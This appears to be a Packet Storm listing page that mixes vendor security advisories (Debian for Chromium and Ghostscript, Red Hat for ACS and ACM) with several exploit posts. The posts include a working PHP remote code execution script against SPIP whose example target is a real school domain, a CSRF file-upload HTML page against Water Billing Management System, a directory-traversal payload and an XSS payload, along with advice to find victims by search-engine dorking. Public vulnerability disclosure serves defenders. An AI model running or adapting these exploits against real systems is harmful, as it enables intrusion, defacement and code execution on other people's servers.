Cacti versions prior to 1.2.27 suffer from an arbitrary file write vulnerability that allows for remote code execution.

Cacti Arbitrary File Write / Remote Code Execution

GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing.

GNUnet P2P Framework 0.22.0

Debian Linux Security Advisory 5761-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5761-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonAugust 29, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-7969 CVE-2024-8193 CVE-2024-8194 CVE-2024-8198Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 128.0.6613.113-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmbRHeAACgkQZF0CR8NudjdiRA/9HmOr5Ptx9ykaQPZsUQolr3OR0gSDNgQtLYVYEWo/Zag3EDlRDDXXC5FKG+ujkWMF9w2OwZjR8j8dH0TFvz/xyI5gM7CdyDMv3FnM0afLaEASkv8EBAW5MLVdOcScfh+TRFrL7XvMW3SN4WtjSJzXiHSaYqrLBfstFy9wfjbQlnoldi6P4jJYuUiTOFb375FkmmjAs7eDF9qeuTvg2Fv2DZxdGJN52hl/saMhfTq46TEWcUTVpgxvXZMbB7T4bwn0FLCs9VGWmI27fO4F+AHT3HQgUTlubxdJvMQ/Z1aMZyQHA4xukVcRFfzHj/EzoWjGXjZe59TQx3QOADVUfVOdS4/mCG+rHhXlj3Hh3U7FrQP/SPCXZ6zcZBrNSG22EJUj3vMrlCikCZau4+0ZnlSfwAKYYenRi3qbfsv0t3Rx7XVRo2vTPVXka5T5NugdFykRdz1cTa0Y/ZllwdAh9yDQ1uFLM9k5xkGprm5yANEn//LUoM1oVviGwMF1oNHxJdupUO3diwu+Uc2GwLChjF9C0ISQYQMVx0SC3JhS41F9eKGamdzoHvJ/S4n8dDiveHlEJ8Np8Eiu3Pw+MRMNFEuBIr2Ets991gofe7WaafPu8SEV7wCbm/hUm6kl4hikcYQLO4d5v1yTOmxPBW03EpZSpBOF7DIOaj7EsWRohuUrMig==5K+x-----END PGP SIGNATURE-----

Debian Security Advisory 5761-1

Debian Linux Security Advisory 5760-1 - Multiple security issues were discovered in Ghostscript, the GPL PostScript/PDF interpreter, which could result in denial of service and potentially the execution of arbitrary code if malformed document files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5760-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoAugust 29, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2024-29506 CVE-2024-29507 CVE-2024-29508 CVE-2024-29509Multiple security issues were discovered in Ghostscript, the GPLPostScript/PDF interpreter, which could result in denial of service andpotentially the execution of arbitrary code if malformed document filesare processed.For the stable distribution (bookworm), these problems have been fixed inversion 10.0.0~dfsg-11+deb12u5.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmbQku1fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Ryhw/9HZ3Ex7IRaIwKZvqanBkgjGakkk00PQES+3I9QRUMDuyKceUXxMZd3WoYGHjcvsIQmSHykmAxkuAZgBIE27eA7x/O/q12l5DekmNOaXNinhsDqWFfOXm+Ge2cA9UiyEIK5jl+Oef/NFoJeV4c+I5lbUoASdvudrg/GPuX182z7RHa3FN3d4ufXokU3gIDoWE72ToS79fKC6esLNpPxgJ5YyIJKZcyY8++SDhE+752BZQkKgyq6ci5n5oPAuPnxu93G8L73RLYrh1SeS3P5aCyEDFw6O5WNVLAMBIq8EPaSmuEWplH6uS7OIjbiGlo+WEaeniHMyKeCbUndwFlFqnL02SHqjXnUSK13BLgElw1pIAqXq8BUqcWl/RSiZO9f52t4kC9Ew8hhCw1rZmHDP0DICMe2ZiXFAPe7gdGOrc3fkb/gmtCgPOv1sV44Vl/Rb+PyDmAig26LyUD2F4ivVuMJMzFbM0ED0KFYT+bNx9WLcVPHA3TTj3td+pb2ixpTb96NTN5rSB70EkhC5MUFCaUQX9s6W8lse6wlVnLkMKtf67R8HqyVoTrZ3/Mz0un9hMSF6w/dA+CrOkUdoCcD+HloKPcMfP/W1ziGoO5cFkdr+fEwHfIxXwCJCY5DU1dQXqrJfM5Wfp4XP6scwj8qt9JWMeOauxg9YhEQRwfWd9FIX4==NB+2-----END PGP SIGNATURE-----

Debian Security Advisory 5760-1

Water Billing Management System version 1.0 suffers from a cross site request forgery that enables an arbitrary file upload.

    =============================================================================================================================================| # Title     : Water Billing Management System 1.0 CSRF Vulnerability                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/wbms_1.zip                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.[+] Line 33 : Set your target url[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Direct File Upload</title></head><body>    <h2>Direct File Upload</h2>    <form id="uploadForm">        <label for="fileInput">Select File:</label>        <input type="file" id="fileInput" name="fileInput" required><br><br>        <button type="button" onclick="uploadFile()">Upload File</button>    </form>    <script>        function uploadFile() {            const fileInput = document.getElementById('fileInput').files[0];            if (!fileInput) {                alert('Please select a file.');                return;            }            const formData = new FormData();            formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');            formData.append('img', fileInput);            console.log("(+) Uploading file...");            fetch('http://127.0.0.1/wbms/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL                method: 'POST',                body: formData            })            .then(response => response.text())            .then(data => {                if (data === '1') {                    console.log("(+) File upload seems to have been successful!");                } else {                    console.log("(-) Oh no, the file upload seems to have failed!");                }            })            .catch(error => console.error("(-) Error during file upload:", error));        }    </script></body></html>        Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Water Billing Management System 1.0 Cross Site Request Forgery / File Upload

Red Hat Security Advisory 2024-6054-03 - Updated images are now available for Red Hat Advanced Cluster Security. The updated image includes security and bug fixes. Issues addressed include deserialization and memory exhaustion vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6054.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: ACS 4.4 enhancement and security updateAdvisory ID:        RHSA-2024:6054-03Product:            Red Hat Advanced Cluster Security for KubernetesAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6054Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-3727====================================================================Summary: Updated images are now available for Red Hat Advanced Cluster Security(RHACS). The updated image includes security and bug fixes.Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:This release of RHACS 4.4.5 includes security fixes for CVE-2024-37298,CVE-2024-3727 and CVE-2024-6104. If you are using an earlier version of RHACS 4.4, you are advised to upgrade to this patch release 4.4.5.Security issues fixed:* gorilla/schema: Potential memory exhaustion attack due to sparse slice deserialization (CVE-2024-37298)* containers/image: digest type does not guarantee valid type (CVE-2024-3727)* go-retryablehttp: url might write sensitive information to log file (CVE-2024-6104)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2024-3727References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.openshift.com/acs/4.4/release_notes/44-release-notes.htmlhttps://bugzilla.redhat.com/show_bug.cgi?id=2274767https://bugzilla.redhat.com/show_bug.cgi?id=2294000https://bugzilla.redhat.com/show_bug.cgi?id=2295010https://issues.redhat.com/browse/ROX-25956

Red Hat Security Advisory 2024-6054-03

Webpay E-Commerce version 1.0 suffers from a directory traversal vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 Directory traversal Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : //bower_components/bootstrap/dist/css/../../Gemfile[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/bower_components/bootstrap/dist/css/../../GemfileGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Directory Traversal

Red Hat Security Advisory 2024-6044-03 - Red Hat Advanced Cluster Management for Kubernetes 2.11.2 General Availability release images, which fix bugs and update container images. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6044.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Low: Red Hat Advanced Cluster Management 2.11.2 bug fixes and container updates  
Advisory ID:        RHSA-2024:6044-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6044  
Issue date:         2024-08-29  
Revision:           03  
CVE Names:          CVE-2022-25883  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.11.2 General  
Availability release images, which fix bugs and update container images.

Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.11.2 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security fix(es):  
CVE-2022-25883 nodejs-semver: Regular expression denial of service

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-25883

References:

https://access.redhat.com/security/updates/classification/#low  
https://issues.redhat.com/browse/ACM-12908  
https://issues.redhat.com/browse/ACM-13041

Red Hat Security Advisory 2024-6044-03

SPIP version 4.2.6 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.6 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.6 Code Execution

WordPress GetYourGuide Ticketing plugin version 1.0.6 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : WordPress GetYourGuide Ticketing plugin 1.0.6 XSS Vulnerability                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://downloads.wordpress.org/plugin/getyourguide-ticketing.1.0.6.zip                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : <input type="text" name="partner_hash" value="<?php echo $partner_hash?>"></input>[+] Install the plugin ‘GetYourGuide Ticketing’ & activate it.[+] Navigate toward the GYG-Ticketing.[+] USe Payload : ` “><img src=x onerror=alert(1)>`[+] Go to link builder to verify the XSS pop-up.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Source

Packet Storm